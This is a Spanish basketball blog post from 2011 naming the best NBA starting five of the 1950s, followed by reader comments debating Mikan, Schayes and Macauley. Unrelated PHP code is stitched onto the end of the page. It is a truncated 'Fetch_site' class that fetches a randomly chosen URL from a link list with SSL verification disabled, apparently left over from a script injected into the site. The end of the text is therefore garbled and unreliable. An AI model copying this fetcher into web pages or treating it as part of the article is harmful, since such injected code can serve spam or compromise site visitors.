Los mejores quintetos de la historia: Década de los 50

03 de October de 2011 por Viva_Dirk
Artículo 1 de 2 de la serie Los mejores quintetos de la historia

Las últimas reuniones para desconvocar el lockout sólo han demostrado que las diferencias entre propietarios y jugadores en lo que al reparto de beneficios se refiere son abismales. Los propietarios quieren que los jugadores reciban “sólo” el 46% de los beneficios mientras que los jugadores sólo están dispuestos a rebajar el 57% del que gozan ahora hasta el 53%. Es posible que en las próximas horas las NBA anuncie que se cancelan el resto de partidos de pretemporada e incluso, algún partido de liga regular. En momentos como este es necesario darle un repaso al Manual de Supervivencia que nos preparó Magic hace unos días.

Pero mientres dure el lockout vamos a intentar entreternos de la mejor forma posible. De forma paralela a la nueva serie de partidos históricos aprovechamos para presentaros otro ciclo “lockout mode”, también de enfoque vintage. Elegiremos los que a nuestro juicio son los mejores quintetos de cada década y lo haremos comenzando por el principio…o casi.

La liga inició su andadura en la temporada 46/47 pero apenas hay datos estadísticos pues no se contabilizaban los rebotes y existen dudas sobre la fiabilidad de la información registrada. Así pues empezaremos con los 50, años en los que ya encontramos nombres totalmente reconocibles. Tened en cuenta que siempre nos referiremos a los hitos estrictamente logrados en la década concreta, sin tener en cuenta lo que se logró antes o después.

– Bob Cousy: El primer gran base la liga y paradigma de la posición hasta nuestros días. El mítico ‘Houdini’ transformó la manera de ver el baloncesto con sus extravagantes pases y su increíble manejo de balón. En una competición que estaba naciendo y donde los hombres pequeños no tenían demasiada importancia, él promediaba 19.4 puntos, 5.8 rebotes y 7.6 asistencias. En esas 10 temporadas lideró la liga en asistencias 8 años consecutivos, fue All-Star 10 veces, 9 elecciones para el mejor quinteto y único MVP de un jugador exterior de la década. 3 anillos y un subcampeonato que definieron lo que conocemos como el orgullo Celtic. Un mito.

– Bill Sharman: Acompañante perfecto de Cousy en el perímetro de aquellos Celtics plagado de “hall of famers” y también en varios de los quintetos ideales de la década. Escolta con una excelente muñeca como demuestra su 42.7% en tiros que en aquellos momentos sólo podían firmar los hombres interiores, sumando un 88% en tiros libres. Su función era la de anotar y la cumplía a la perfección. Con 18 puntos, 4 rebotes y 3 asistencias fue pieza clave en 3 anillos y un subcampeonato. All-Star 8 veces y 4 apariciones en el mejor quinteto (una más en el segundo).

– Paul Arizin: El gran anotador exterior de la década. Revolucionario por su decisiva aportación en el lanzamiento en suspensión, con 23 puntos por noche Arizin fue desequilibrante durante toda su carrera. A su inmensa capacidad anotadora sumaba un gran instinto para el rebote. Con poco más de 1.90 promediaba 9 por partido, algo contra lo que no podía pelear casi ninguno de sus pares. Jugó 10 All-Stars, fue elegido 3 veces en el mejor quinteto y, lo más importante, fue capaz de ser liderar a sus Philadelphia Warriors hasta el anillo desde el perímetro.

– Bob Pettit: El primer jugador que podemos considerar una superestrella. Imparable para sus contemporáneos y quién sabe si para jugadores de cualquier época. Durante los 6 años que jugó en los 50, Pettit promedió la animalada de 25 puntos y 16 rebotes. Hasta su aparición en la liga no se concebía que alguien con 2.08 pudiera jugar alejado al aro, algo nunca visto. Es el primer ala-pívot ‘moderno’ de la historia nada menos que en los años 50. Un extraterrestre. Todas sus temporadas fue All-Star y elegido en el mejor quinteto, ganador de 2 MVP’s y de un anillo ganado con los Milwaukee Haks nada menos que a los mejores Celtics, justo cuando Russell ya iniciaba su dictadura en la liga.

– Bill Russell: Lo veremos también en la década de los 60 que fue suya casi al completo. Nada más aterrizar en la liga, en 1956, este hombre se hizo con su primer anillo sin reconocimiento individual alguno, algo que nunca buscó aunque a día de hoy el MVP de las finales reciba su nombre. Durante esos 4 años se llevó los 3 primeros anillos de su colección y un MVP, apareció una vez en el mejor quinteto y participó en 3 All-Stars. Promedió 16.7 puntos, 22.6 rebotes, 3 asistencias y quien sabe cuantos tapones. Ya empezaba a simbolizar en su persona el baloncesto de equipo y la victoria colectiva por encima de todo.

Comenta

5 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Parece que con estos nombres puestos encima de la mesa es imposible discrepar. Yo lo voy a hacer, aunque sólo sea para hacer honor a otros nombres menos recordados.

    Para empezar me chirría Russell como mejor center de la década. Para mí los 50 son de Mikan simplemente por una cuestión cronológica. Mikan fue realmente la primera super-estrella de la liga que se fichó en el 49 para dar renombre a la liga. Es célebre el “Knicks vs Mikan” y en mi opinión el 29-14 que se marcó en la 50-51 no estaba al alcance del Russell de la década (en realidad de toda su carrera, pero bueno)
    Además, habría que añadir a la cuestión el nombre de Neil Johnston, de los Warriors. Campeones en el 56. Cronológicamente clavado a esa década y líder anotador de la misma en términos absolutos. También lideró la liga en promedio de victorias durante un lustro. Es un jugador del que apenas nadie sabe nada.

    Pero la gran injusticia que se comete habitualmente cuando nos referimos a la década es con Dolph Schayes de los Nationals (Sixers) del que ya hablamos en su día. Jugando de 4 admito que de ninguna manera podría discutirle el puesto a Pettit, el verdadero extraterrestre de la década y el mejor jugador de la misma, pero aunque parezca sacrilegio sí se la podría discutir a los centers que hemos barajado (hablo de lo que consiguieron estrictamente en la década) Así que dado que Pettit también podía jugar de center creo que realmente el quinteto ideal podría haber sido Schayes-Pettit.
    Sólo destacar que los promedios de Schayes fueron de 20-14 y estuvo presente absolutamente todos los años en los quintetos ideales (el primero frecuentemente y alguna vez en el segundo) Increíblemente regular, esa década no se entiende sin él… y aquí no lo conocemos ni el tato.

    Por último, resaltando que Cousy, Arizin y Pettit son los intocables de la lista decir que quien menos brilla es Sharman, que era un especialista muy poderoso pero que no creo de el perfil para este tipo de listas. Utilizando el argot del gran Viva_Dirk diría que es el menos “jugador franquicia” de todos con diferencia y creo que se benefició de jugar en aquellos Celtics, en aquel contexto y con esa filosofía. También es cierto que no era una época de exteriores y no tiene mucha competencia en el puesto.

      Citar

  2. HisRoyalAirness dice:
    #2

    Gran artículo y gran apunte de Deer, la verdad es que de los 50 estoy bastante pez así que prefiero leer y aprender.
    Para los siguientes ya tendré más opinión.
    De Schayes no conocía practicamente nada, salvo lo que había leído en algún artículo en inglés perdido por la red; nunca te acostarás sin saber una cosa más

      Citar

  3. JHC dice:
    #3

    HisRoyalAirness:
    Gran artículo y gran apunte de Deer, la verdad es que de los 50 estoy bastante pez así que prefiero leer y aprender.
    Para los siguientes ya tendré más opinión.

    me pasa lo mismo de esta época conosco mas bien poquito, los jugadores y eso pero poquillo mas, cuando vallan llegando los 80 es donde mas conozco yo xD

      Citar

  4. luisguada dice:
    #4

    de acuerdo con Deer, en mi opinión los 50 fueron de Mikan, el primer Gran Dominador, por otra parte apenas conozco algún jugador de esta década que no ya sido citado ya.

    Me encantan estos artículos.

      Citar

  5. TheDeerHunter dice:
    #5

    Por lo visto hoy ha muerto uno de los grandes de esta década: Ed Macauley.
    http://www.nytimes.com/aponline/2011/11/09/sports/basketball/AP-BKN-Obit-Macauley.html?_r=2&ref=sports

    Fue equipo ideal del 50 al 53 y MVP del all-star del 51. Center estelar, primero de los Celtics primigenios y luego de los Hawks campeones, al lado de Pettit. Un jugador de 20-9 en sus mejores temporadas.

    DEP

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>